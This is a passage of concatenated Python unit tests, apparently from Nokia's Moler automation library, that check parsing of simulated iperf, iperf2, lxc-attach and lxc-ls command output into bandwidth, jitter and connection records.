TIME: 14:38:18
ZONE: +0100 CET
EPOCH: 1521034698
WEEK_NUMBER: 11
DAY_OF_YEAR: 73
DAY_OF_WEEK: 3 (Wednesday)
MONTH: 3 (March)
user@host:~>"""
result = {
'DATE': {
'FULL': '14-03-2018',
'YEAR': '2018',
'MONTH': '03',
'DAY': '14'
},
'DAY_NAME': 'Wednesday',
'DAY_OF_YEAR': 73,
'DAY_OF_MONTH': 14,
'DAY_OF_WEEK': 3,
'EPOCH': 1521034698,
'MONTH_NAME': 'March',
'MONTH_NUMBER': 3,
'TIME': {
'FULL': '14:38:18',
'MINUTE': '38',
'HOUR': '14',
'SECOND': '18',
},
'WEEK_NUMBER': 11,
'ZONE': {
'FULL': '+0100 CET',
'SIGN': '+',
'HOUR': '01',
'MINUTE': '00',
'NAME': 'CET'
}
}
return data, result
```
#### File: cmd/unix/test_cmd_iperf2.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import pytest
import mock
from moler.cmd.unix.iperf2 import Iperf2
from moler.exceptions import CommandFailure
def test_iperf_returns_proper_command_string(buffer_connection):
iperf_cmd = Iperf2(buffer_connection, options='-c 10.1.1.1 -M 1300 -m')
assert "iperf -c 10.1.1.1 -M 1300 -m" == iperf_cmd.command_string
def test_iperf_can_set_direct_path_to_command_executable(buffer_connection):
iperf_cmd = Iperf2(buffer_connection, options='-c 10.1.1.1 -M 1300 -m')
assert "iperf -c 10.1.1.1 -M 1300 -m" == iperf_cmd.command_string
iperf_cmd.command_path = 'adb shell /data/data/com.magicandroidapps.iperf/bin/'
assert "adb shell /data/data/com.magicandroidapps.iperf/bin/iperf -c 10.1.1.1 -M 1300 -m" == iperf_cmd.command_string
def test_iperf_raise_error_on_bind_failed(buffer_connection, command_output_and_expected_result_on_bind_failed):
iperf_cmd = Iperf2(connection=buffer_connection.moler_connection, options='-s')
command_output, expected_result = command_output_and_expected_result_on_bind_failed
buffer_connection.remote_inject_response([command_output])
assert 'iperf -s' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_no_such_file(buffer_connection, command_output_and_expected_result_on_connect_failed):
iperf_cmd = Iperf2(connection=buffer_connection.moler_connection, options='-c 10.156.236.132')
command_output, expected_result = command_output_and_expected_result_on_connect_failed
buffer_connection.remote_inject_response([command_output])
assert 'iperf -c 10.156.236.132' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_iperf_problem(buffer_connection, command_output_and_expected_result_on_iperf_problem):
iperf_cmd = Iperf2(connection=buffer_connection.moler_connection, options='-i')
command_output, expected_result = command_output_and_expected_result_on_iperf_problem
buffer_connection.remote_inject_response([command_output])
assert 'iperf -i' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_iperf_problem(buffer_connection):
with pytest.raises(AttributeError) as err:
Iperf2(connection=buffer_connection.moler_connection, options='-d -P 10')
assert "Unsupported options combination (--dualtest & --parallel)" in str(err.value)
def test_iperf_stores_connections_as_host_port_tuple_for_local_and_remote(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_server)
iperf_cmd()
stored_connections = iperf_cmd.result()['CONNECTIONS'].keys()
# local port@host remote port@host
assert len(stored_connections) == 4
assert ('[email protected]', '[email protected]') in stored_connections
assert ('[email protected]', '[email protected]') in stored_connections
assert ('192.168.0.10', '[email protected]') in stored_connections
assert ('192.168.0.12', '[email protected]') in stored_connections
def test_iperf_stores_connections_as_port_at_host_tuple_for_local_and_remote(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_server)
iperf_cmd()
stored_connections = iperf_cmd.result()['CONNECTIONS'].keys()
# local host:port remote host:port
assert len(stored_connections) == 4
assert ('[email protected]', '[email protected]') in stored_connections
assert ('[email protected]', '[email protected]') in stored_connections
assert ('192.168.0.10', '[email protected]') in stored_connections
assert ('192.168.0.12', '[email protected]') in stored_connections
def test_iperf_stores_ipv6_connections_as_port_at_host_tuple_for_local_and_remote(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_tcp_ipv6_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_tcp_ipv6_client)
iperf_cmd()
stored_connections = iperf_cmd.result()['CONNECTIONS'].keys()
# local port@host remote port@host
assert len(stored_connections) == 2
assert ("49597@fd00::2:0", "5901@fd00::1:0") in stored_connections
assert ("fd00::2:0", "5901@fd00::1:0") in stored_connections
def test_iperf_creates_summary_connection_for_parallel_testing(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections)
iperf_cmd()
stored_connections = iperf_cmd.result()['CONNECTIONS'].keys()
# local host:port remote host:port
assert len(stored_connections) == 22
assert ('[email protected]', '[email protected]') in stored_connections # summary
assert ('192.168.0.102', '[email protected]') in stored_connections # result
def test_iperf_ignores_multiple_echo_of_command(buffer_connection):
# running on cygwin may cause getting multiple echo even mixed with prompt
from moler.cmd.unix import iperf2
collected_lines = []
output_with_multiple_echo = "andromeda:/ # /bin/iperf -c 1.2.3.4 -p 5001 -f k -i 1.0 -t 6.0 --dualtest\n" + \
"/bin/iperf -c 1.2.3.4 -p 5001 -f k -i 1.0 -t 6.0 -\n" + \
"andromeda:/ # /bin/iperf -c 1.2.3.4 -p 5001 -f k -i 1.0 -t 6.0 --dualtest\n" + \
"------------------------------------------------------------\n" + \
"[ 3] local 192.168.0.1 port 49597 connected with 1.2.3.4 port 5001\n" + \
"[ ID] Interval Transfer Bandwidth\n" + \
"[ 3] 0.0- 1.0 sec 28.6 MBytes 240 Mbits/sec\n" + \
"[ 3] 0.0-10.0 sec 265 MBytes 222 Mbits/sec\n"+ \
"andromeda:/ # "
buffer_connection.remote_inject_response([output_with_multiple_echo])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
prompt='andromeda:/ # ',
options='-c 1.2.3.4 -p 5001 -f k -i 1.0 -t 6.0 --dualtest')
iperf_cmd.command_path = '/bin/'
oryg_on_new_line = iperf_cmd.__class__.on_new_line
def on_new_line(self, line, is_full_line):
collected_lines.append(line)
oryg_on_new_line(self, line, is_full_line)
with mock.patch.object(iperf_cmd.__class__, "on_new_line", on_new_line):
iperf_cmd()
assert "andromeda:/ # /bin/iperf -c 172.16.17.32 -p 5001 -f k -i 1.0 -t 6.0 --dualtest" not in collected_lines
def test_iperf_correctly_parses_bidirectional_udp_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_client)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_bidirectional_udp_client
def test_iperf_correctly_parses_bidirectional_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_server)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_bidirectional_udp_server
def test_iperf_correctly_parses_basic_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_basic_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_basic_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_basic_server
def test_iperf_correctly_parses_basic_tcp_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_basic_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_basic_client)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_basic_client
def test_iperf_correctly_parses_tcp_ipv6_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_tcp_ipv6_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_tcp_ipv6_client)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_tcp_ipv6_client
def test_iperf_correctly_parses_tcp_ipv6_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_tcp_ipv6_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_tcp_ipv6_server)
res = iperf_cmd()
assert res == iperf2.COMMAND_RESULT_tcp_ipv6_server
def test_iperf_correctly_parses_multiconnection_tcp_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections
def test_iperf_correctly_parses_multiconnection_tcp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections_server
def test_iperf_server_detects_all_multiport_records_of_interval(buffer_connection):
from moler.cmd.unix import iperf2
from moler.exceptions import ParsingDone
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
client_connection_lines = [
"[ 1] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51914",
"[ 2] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51915",
"[ 3] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51916",
]
for line in client_connection_lines:
try:
iperf_cmd._parse_connection_name_and_id(line)
except ParsingDone:
pass
parallel_client_1 = ('[email protected]', '[email protected]')
parallel_client_2 = ('[email protected]', '[email protected]')
parallel_client_3 = ('[email protected]', '[email protected]')
single_record = {'Lost_Datagrams_ratio': '0%',
'Jitter': '1.2 ms',
'Transfer': 123904,
'Interval': (0.0, 1.0),
'Transfer Raw': '121 KBytes',
'Bandwidth': 123500,
'Lost_vs_Total_Datagrams': (0, 84),
'Bandwidth Raw': '988 Kbits/sec'}
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_1] = [single_record]
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_2] = [single_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_2) is False
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_3] = [single_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_3) is True
second_record = dict(single_record)
second_record['Interval'] = (1.0, 2.0)
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_1] = [second_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_1) is False
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_2] = [second_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_2) is False
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_3] = [second_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_3) is True
def test_iperf_server_can_calculate_multiport_summary_record_of_interval(buffer_connection):
from moler.cmd.unix import iperf2
from moler.exceptions import ParsingDone
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
client_connection_lines = [
"[ 1] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51914",
"[ 2] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51915",
"[ 3] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51916",
]
for line in client_connection_lines:
try:
iperf_cmd._parse_connection_name_and_id(line)
except ParsingDone:
pass
parallel_client_1 = ('[email protected]', '[email protected]')
parallel_client_2 = ('[email protected]', '[email protected]')
parallel_client_3 = ('[email protected]', '[email protected]')
first_record = {'Lost_Datagrams_ratio': '0%',
'Jitter': '1.2 ms',
'Transfer': 123904,
'Interval': (0.0, 1.0),
'Transfer Raw': '121 KBytes',
'Bandwidth': 123500,
'Lost_vs_Total_Datagrams': (0, 84),
'Bandwidth Raw': '988 Kbits/sec'}
second_record = dict(first_record)
second_record['Jitter'] = '0.98 ms'
third_record = dict(first_record)
third_record['Jitter'] = '1.48 ms'
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_1] = [first_record]
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_2] = [second_record]
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_3] = [third_record]
iperf_cmd._calculate_multiport_summary_record_of_interval(parallel_client_3)
summary_connection = ('[email protected]', '[email protected]')
assert summary_connection in iperf_cmd.current_ret['CONNECTIONS']
assert iperf_cmd.current_ret['CONNECTIONS'][summary_connection] == [{
'Interval': (0.0, 1.0),
'Transfer': 371712,
'Transfer Raw': '363.0 KBytes',
'Bandwidth': 370500,
'Bandwidth Raw': '2964.0 Kbits/sec',
'Jitter': '1.48 ms',
'Lost_vs_Total_Datagrams': (0, 252),
'Lost_Datagrams_ratio': '0.00%',
}]
def test_iperf_correctly_parses_multiconnection_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections_udp_server
def test_iperf_correctly_parses_multiconnection_udp_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_udp_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_client)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections_udp_client
def test_iperf_correctly_breaks_server_on_final_inactivity(buffer_connection):
from moler.cmd.unix import iperf2
cmd_output = iperf2.COMMAND_OUTPUT_multiple_connections_udp_server.split("\n")
prompt = cmd_output.pop()
cmd_output_without_prompt = "\n".join(cmd_output) + "\n"
buffer_connection.remote_inject_response([cmd_output_without_prompt])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
def injecting_break_cmd(self):
self.connection.send("\x03") # ctrl+c
buffer_connection.remote_inject_line(line="^C", add_newline=False)
buffer_connection.remote_inject_line(line=prompt, add_newline=False)
iperf_cmd.break_on_timeout = False # ensuring that break_cmd() is not called via on_timeout()
with mock.patch.object(iperf_cmd.__class__, "break_cmd", injecting_break_cmd):
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections_udp_server
def test_iperf_correctly_parses_singlerun_tcp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_singlerun_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_singlerun_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_singlerun_server
def test_iperf_correctly_parses_singlerun_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_singlerun_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_singlerun_udp_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_singlerun_udp_server
def test_iperf_singlerun_server_doesnt_use_ctrlc_to_stop_server(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_singlerun_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_singlerun_server)
with mock.patch.object(iperf_cmd, "break_cmd") as send_ctrlc:
iperf_cmd()
send_ctrlc.assert_not_called()
def test_iperf_detecting_dualtest_at_client(buffer_connection):
from moler.cmd.unix import iperf2
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_client)
assert iperf_cmd.works_in_dualtest is True
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_basic_client)
assert iperf_cmd.works_in_dualtest is False
def test_iperf_detecting_dualtest_at_server(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_server)
iperf_cmd()
assert iperf_cmd.works_in_dualtest is True
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_server)
iperf_cmd()
assert iperf_cmd.works_in_dualtest is False
def test_iperf_sends_additional_ctrl_c_after_detecting_to_early_ctrl_c(buffer_connection):
from moler.cmd.unix import iperf2
normal_iperf_output = iperf2.COMMAND_OUTPUT_multiple_connections_server.splitlines(True)
last_line_with_prompt = normal_iperf_output[-1]
normal_iperf_output[-1] = "^CWaiting for server threads to complete. Interrupt again to force quit\n"
normal_iperf_output.append(last_line_with_prompt)
output_with_too_early_ctrl_c = "".join(normal_iperf_output)
buffer_connection.remote_inject_response([output_with_too_early_ctrl_c])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_server)
with mock.patch.object(iperf_cmd, "_stop_server"):
with mock.patch.object(iperf_cmd, "break_cmd") as break_cmd_method:
iperf_cmd()
break_cmd_method.assert_called_once_with()
iperf_server_output_start = """
xyz@debian:~$ iperf -s -u -i 1
------------------------------------------------------------
Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size: 8.00 KByte (default)
------------------------------------------------------------
[904] local 10.1.1.1 port 5001 connected with 10.6.2.5 port 32781
"""
def test_iperf_publishes_records_to_subscribed_observers(buffer_connection):
from moler.cmd.unix import iperf2
conn = buffer_connection
conn.remote_inject_response([iperf_server_output_start])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
options='-s -u -i 1')
iperf_stats = []
def iperf_observer(from_client, to_server, data_record=None, report=None):
iperf_record = {}
iperf_record['from_client'] = from_client
iperf_record['to_server'] = to_server
if data_record:
iperf_record['data_record'] = data_record
if report:
iperf_record['report'] = report
iperf_stats.append(iperf_record)
iperf_cmd.subscribe(subscriber=iperf_observer)
iperf_cmd.start()
assert len(iperf_stats) == 0
conn.remote_inject_line("[ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams")
assert len(iperf_stats) == 0
conn.remote_inject_line("[904] 0.0- 1.0 sec 1.17 MBytes 9.84 Mbits/sec 1.830 ms 0/ 837 (0%)")
assert len(iperf_stats) == 1
assert iperf_stats[0]['from_client'] == '[email protected]'
assert iperf_stats[0]['to_server'] == '[email protected]'
# iperf progress lines produce data_records
assert iperf_stats[0]['data_record'] == {'Interval': (0.0, 1.0),
'Transfer': 1226833,
'Transfer Raw': u'1.17 MBytes',
'Bandwidth': 1230000,
'Bandwidth Raw': u'9.84 Mbits/sec',
'Jitter': u'1.830 ms',
'Lost_vs_Total_Datagrams': (0, 837),
'Lost_Datagrams_ratio': u'0%'}
conn.remote_inject_line("[904] 1.0- 2.0 sec 1.18 MBytes 9.94 Mbits/sec 1.846 ms 5/ 850 (0.59%)")
assert len(iperf_stats) == 2
assert ('data_record' in iperf_stats[-1]) and ('report' not in iperf_stats[-1])
conn.remote_inject_line("[904] 9.0-10.0 sec 1.19 MBytes 10.0 Mbits/sec 1.801 ms 0/ 851 (0%)")
assert len(iperf_stats) == 3
assert ('data_record' in iperf_stats[-1]) and ('report' not in iperf_stats[-1])
# last line of iperf progress produces report
conn.remote_inject_line("[904] 0.0-10.0 sec 11.8 MBytes 9.86 Mbits/sec 2.618 ms 9/ 8409 (0.11%)")
assert len(iperf_stats) == 4
assert 'data_record' not in iperf_stats[-1]
assert iperf_stats[-1]['from_client'] == '10.6.2.5'
assert iperf_stats[-1]['to_server'] == '[email protected]'
assert iperf_stats[-1]['report'] == {'Interval': (0.0, 10.0),
'Transfer': 12373196,
'Transfer Raw': u'11.8 MBytes',
'Bandwidth': 1232500,
'Bandwidth Raw': u'9.86 Mbits/sec',
'Jitter': u'2.618 ms',
'Lost_vs_Total_Datagrams': (9, 8409),
'Lost_Datagrams_ratio': u'0.11%'}
iperf_cmd.cancel()
def test_iperf_publishes_only_summary_records_when_handling_parallel_clients(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
expected_result = iperf2.COMMAND_RESULT_multiple_connections_udp_server
iperf_stats = {}
iperf_report = {}
def iperf_observer(from_client, to_server, data_record=None, report=None):
conn_name = (from_client, to_server)
if data_record:
if conn_name not in iperf_stats:
iperf_stats[conn_name] = []
iperf_stats[conn_name].append(data_record)
if report:
iperf_report[conn_name] = report
iperf_cmd.subscribe(subscriber=iperf_observer)
iperf_cmd()
# published stats should be as
summary_conn_name = ('[email protected]', '[email protected]')
client_conn_name = ('192.168.44.1', '[email protected]')
assert client_conn_name in iperf_report
assert summary_conn_name in iperf_stats
assert len(iperf_stats.keys()) == 1
assert iperf_stats[summary_conn_name] == expected_result['CONNECTIONS'][summary_conn_name][:-1]
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_udp_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_client)
expected_result = iperf2.COMMAND_RESULT_multiple_connections_udp_client
iperf_stats = {}
iperf_report = {}
iperf_cmd.subscribe(subscriber=iperf_observer)
iperf_cmd()
# published stats should be as
summary_conn_name = ('[email protected]', '[email protected]')
client_conn_name = ('192.168.33.5', '[email protected]')
assert client_conn_name in iperf_report
assert summary_conn_name in iperf_stats
assert len(iperf_stats.keys()) == 1
assert iperf_stats[summary_conn_name] == expected_result['CONNECTIONS'][summary_conn_name][:-1]
@pytest.fixture
def command_output_and_expected_result_on_bind_failed():
output = """xyz@debian>iperf -s
bind failed: Address already in use
xyz@debian>"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_on_connect_failed():
output = """xyz@debian>iperf -c 10.156.236.132
connect failed: Connection refused
xyz@debian>"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_on_iperf_problem():
output = """xyz@debian>iperf -i
iperf: option requires an argument -- i
xyz@debian>"""
result = dict()
return output, result
```
#### File: cmd/unix/test_cmd_iperf.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.cmd.unix.iperf import Iperf
from moler.exceptions import CommandFailure
def test_iperf_returns_proper_command_string(buffer_connection):
iperf_cmd = Iperf(buffer_connection, options='-c 10.1.1.1 -M 1300 -m')
assert "iperf -c 10.1.1.1 -M 1300 -m" == iperf_cmd.command_string
def test_iperf_raise_error_on_bind_failed(buffer_connection, command_output_and_expected_result_on_bind_failed):
iperf_cmd = Iperf(connection=buffer_connection.moler_connection, options='-s')
command_output, expected_result = command_output_and_expected_result_on_bind_failed
buffer_connection.remote_inject_response([command_output])
assert 'iperf -s' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_no_such_file(buffer_connection, command_output_and_expected_result_on_connect_failed):
iperf_cmd = Iperf(connection=buffer_connection.moler_connection, options='-c 10.156.236.132')
command_output, expected_result = command_output_and_expected_result_on_connect_failed
buffer_connection.remote_inject_response([command_output])
assert 'iperf -c 10.156.236.132' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_iperf_problem(buffer_connection, command_output_and_expected_result_on_iperf_problem):
iperf_cmd = Iperf(connection=buffer_connection.moler_connection, options='-i')
command_output, expected_result = command_output_and_expected_result_on_iperf_problem
buffer_connection.remote_inject_response([command_output])
assert 'iperf -i' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_correctly_parses_bidirectional_udp_client_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_bidirectional_udp_client])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_bidirectional_udp_client)
res = iperf_cmd()
assert res == iperf.COMMAND_RESULT_bidirectional_udp_client
def test_iperf_correctly_parses_bidirectional_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_bidirectional_udp_server)
res = iperf_cmd()
assert res == iperf.COMMAND_RESULT_bidirectional_udp_server
def test_iperf_correctly_parses_basic_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_basic_server])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_basic_server)
assert iperf_cmd() == iperf.COMMAND_RESULT_basic_server
def test_iperf_correctly_parses_basic_tcp_client_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_basic_client])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_basic_client)
assert iperf_cmd() == iperf.COMMAND_RESULT_basic_client
def test_iperf_correctly_parses_multiconnection_tcp_client_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_multiple_connections])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_multiple_connections)
assert iperf_cmd() == iperf.COMMAND_RESULT_multiple_connections
@pytest.fixture
def command_output_and_expected_result_on_bind_failed():
output = """xyz@debian>iperf -s
bind failed: Address already in use
xyz@debian>"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_on_connect_failed():
output = """xyz@debian>iperf -c 10.156.236.132
connect failed: Connection refused
xyz@debian>"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_on_iperf_problem():
output = """xyz@debian>iperf -i
iperf: option requires an argument -- i
xyz@debian>"""
result = dict()
return output, result
```
#### File: cmd/unix/test_cmd_lxc_attach.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2019-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.lxc_attach import LxcAttach
from moler.exceptions import CommandFailure
import pytest
def test_lxc_attach_raise_command_error(buffer_connection, command_output_and_expected_result):
data, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response(data)
cmd = LxcAttach(connection=buffer_connection.moler_connection, name="0x4013")
with pytest.raises(CommandFailure):
cmd()
@pytest.fixture()
def command_output_and_expected_result():
data = """
lxc-attach --name=0x4013
lxc-attach: 0x4013: attach.c: lxc_attach: 843 Failed to get init pid.
root@server:~ >"""
result = {}
return data, result
```
#### File: cmd/unix/test_cmd_lxcls.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2019-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.lxc_ls import LxcLs
from moler.exceptions import CommandFailure
import pytest
def test_lxcls_raise_command_error(buffer_connection, command_output_and_expected_result):
data, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response(data)
cmd = LxcLs(connection=buffer_connection.moler_connection, options="--nesting=3")
with pytest.raises(CommandFailure):
cmd()
@pytest.fixture()
def command_output_and_expected_result():
data = """lxc-ls --nesting=3
lxc-ls: attach.c: lxc_proc_get_context_info: 205 No such file or directory - Could not open /proc/26769/status.
lxc-ls: attach.c: lxc_attach: 849 Failed to get context of init process: 21769
0xe000 0xe000/0xe000
root@server:~ >"""
result = {}
return data, result
```
#### File: cmd/unix/test_cmd_mount.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.cmd.unix.mount import Mount
from moler.exceptions import CommandFailure
def test_mount_returns_proper_command_string(buffer_connection):
